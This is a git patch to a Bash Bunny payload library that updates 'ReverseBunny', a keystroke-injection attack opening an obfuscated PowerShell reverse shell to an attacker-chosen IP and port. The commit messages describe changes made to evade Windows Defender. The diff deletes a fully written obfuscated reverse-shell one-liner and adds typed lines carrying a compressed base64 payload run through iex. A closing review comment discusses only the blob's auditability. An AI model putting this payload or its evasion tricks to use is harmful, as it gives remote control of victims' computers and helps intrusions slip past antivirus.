From 54505507b9c4d8516979b8fa003726f9b543573d Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Mon, 6 Dec 2021 21:08:42 +0100
Subject: [PATCH] Updated ReverseBunny to version 1.2 (#475)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* Uploaded ReverseBunny Obfuscated reverse shell via powershell
* Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
* Update ReverseBunny.txt Changed payload to evade Windows Defender
* Update payload.txt Added new "Eject Method" - props to Night(9o3)
* Update README.md
* Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV
* Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design
* Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update
* Updated payload fixed some stupid left overs <3
---
 .../remote_access/ReverseBunny/README.md | 12 +++-
 .../ReverseBunny/ReverseBunny.txt | 1 -
 .../remote_access/ReverseBunny/payload.txt | 66 ++++++++-----------
 3 files changed, 39 insertions(+), 40 deletions(-)
 delete mode 100644 payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md
index ba8e344e..7fced069 100644
--- a/payloads/library/remote_access/ReverseBunny/README.md
+++ b/payloads/library/remote_access/ReverseBunny/README.md
@@ -2,8 +2,16 @@ Title: ReverseBunny
 Author: 0iphor13
-Version: 1.0
+Version: 1.2
 Getting remote access via obfuscated reverse shell.
-RevBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB.
+Change the variables in payload.txt to your attacking maschine & start your listener.
+
+Whats new in version 1.2?
+- Changed the whole payload
+- Added custom shell design
+
+Coming soon:
+- Custom commands
+- New evasion technique
diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
deleted file mode 100644
index 65d50681..00000000
--- a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
+++ /dev/null
@@ -1 +0,0 @@
-$bb =(gwmi win32_volume -f 'label=''BashBunny''').Name;$IP='0.0.0.0';$PORT=4444;Start-Sleep 5;New-Item -ItemType file $bb"DONE";;(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");${J`F5Z6}= [typE]("{3}{4}{1}{2}{0}"-f'INg',("{0}{1}" -f'XT.','eN'),'cOD','T','e'); ${clI`e`Nt} = &("{1}{0}{3}{2}" -f 'ew','N','t',("{0}{1}"-f ("{0}{1}"-f'-O','bj'),'ec')) ("{2}{7}{1}{3}{0}{6}{5}{8}{4}" -f("{1}{0}"-f '.T',("{0}{1}"-f 'ke','ts')),'.','Sys',("{0}{1}"-f 'Net',("{1}{0}" -f'Soc','.')),'nt','PCl','C','tem','ie')(${IP},${pO`RT});${st`ReAm} = ${c`l`iENT}.("{2}{0}{1}{3}"-f'e',("{0}{1}" -f 'tSt','r'),'G','eam')."I`N`Voke"();[byte[]]${by`T`es} = 0..65535|.('%'){0};while((${i} = ${stRe`AM}.("{1}{0}" -f 'ad','Re')."InVO`KE"(${B`y`TES}, 0, ${BYt`eS}."LEn`GTh")) -ne 0){;${D`ATA} = (.("{3}{1}{2}{0}" -f ("{0}{1}"-f 'je','ct'),'w-','Ob','Ne') -TypeName ("{6}{5}{0}{4}{2}{3}{7}{1}"-f 'st',("{0}{1}" -f 'di','ng'),("{1}{0}"-f ("{1}{0}" -f't.A','Tex'),'.'),("{1}{0}" -f'E',("{1}{0}" -f'II','SC')),'em','y','S','nco'))."Ge`Ts`Tr`inG"(${BYt`ES},0, ${I});${Se`N`DbAck} = (.("{1}{0}" -f'ex','i') ${d`AtA} 2>&1 | &("{1}{0}{2}" -f'ut','O',("{0}{1}" -f '-',("{2}{0}{1}" -f 't',("{1}{0}" -f'g','rin'),'S'))) );${Send`B`Ac`K2} = ${sEn`DBack} + 'PS ' + (.("{1}{0}"-f 'wd','p'))."P`ATh" + '> ';${sEN`dB`yTE} = ( ${j`F`5Z6}::"AS`CIi").("{1}{0}{2}"-f 't','Ge',("{0}{1}" -f 'By','tes'))."I`NvoKE"(${s`e`NdBA`Ck2});${str`e`AM}.("{0}{1}"-f 'W',("{0}{1}" -f'r','ite'))."In`VOke"(${Send`BYtE},0,${Send`BYtE}."lE`N`gTh");${s`Tr`eaM}.("{1}{0}" -f 'ush','Fl')."inV`oKe"()};${ClI`E`Nt}.("{1}{0}" -f 'se','Clo')."iNV`O`KE"();
diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt
index 945fac51..694781e6 100644
--- a/payloads/library/remote_access/ReverseBunny/payload.txt
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@@ -3,53 +3,45 @@ # Title: ReverseBunny
 # Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me.
 # Author: 0iphor13
-# Version: 1.1
+# Version: 1.2
 # Category: Remote_Access
-# Attackmodes: HID, Storage
+# Attackmodes: HID
 LED SETUP
-GET SWITCH_POSITION
 DUCKY_LANG de
-rm /root/udisk/DONE
+ATTACKMODE HID
-ATTACKMODE HID STORAGE
-
-#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
-
-LED STAGE1
+#If needed, use this option
+#WAIT_FOR_PRESENT Your_Device
 DELAY 5000
-RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass"
-DELAY 6000
+Q GUI r
+DELAY 5000
+Q STRING "powershell -NoP -NonI -W hidden"
+DELAY 5000
+Q ENTER
-Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))"
-DELAY 10000
-Q ENTER
-DELAY 10000
-Q CONTROL v
-DELAY 10000
-Q ENTER
 DELAY 1000
-
-LED STAGE2
-
-until [ -f /root/udisk/DONE ]
- do
- sleep 0.2
-done
-
-LED CLEANUP
-
-rm /root/udisk/DONE
-
-DELAY 100
-
-sync
-
-DELAY 100
+Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I"
+DELAY 1000
+Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH"
+DELAY 1000
+Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R"
+DELAY 1000
+Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ"
+DELAY 1000
+Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf"
+DELAY 1000
+Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN"
+DELAY 1000
+Q STRING 
"eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ"
+DELAY 1000
+Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp"
+DELAY 1000
+Q STRING "ReSS ) | %{ NEw-ObJECt systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )"
+DELAY 1000
+Q ENTER
 LED FINISH
-
-#SAVE TO EJECT
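Review bot: The nine added `Q STRING` lines that replace the old `Set-Clipboard`/`RevBunny.txt` stage carry the entire PowerShell body as a deflate-compressed base64 literal that is expanded and invoked at runtime, and because ReverseBunny.txt is deleted in the same commit the repository no longer contains any readable source for what that literal expands to. For a shared payload library that is a provenance problem: a maintainer reviewing this cannot diff the behaviour of 1.2 against 1.1, and a later contributor has no way to regenerate or audit the blob without reverse-engineering it. I would add a header comment such as `# Encoded block below was generated from <plaintext source file>; keep that file in this directory and regenerate it rather than hand-editing the base64` and check the plaintext source in beside payload.txt. The `# Description` context line still only says "obfuscated powershell code", so the header should also state in one sentence what the expanded code does, as the README's "reverse shell" wording already does.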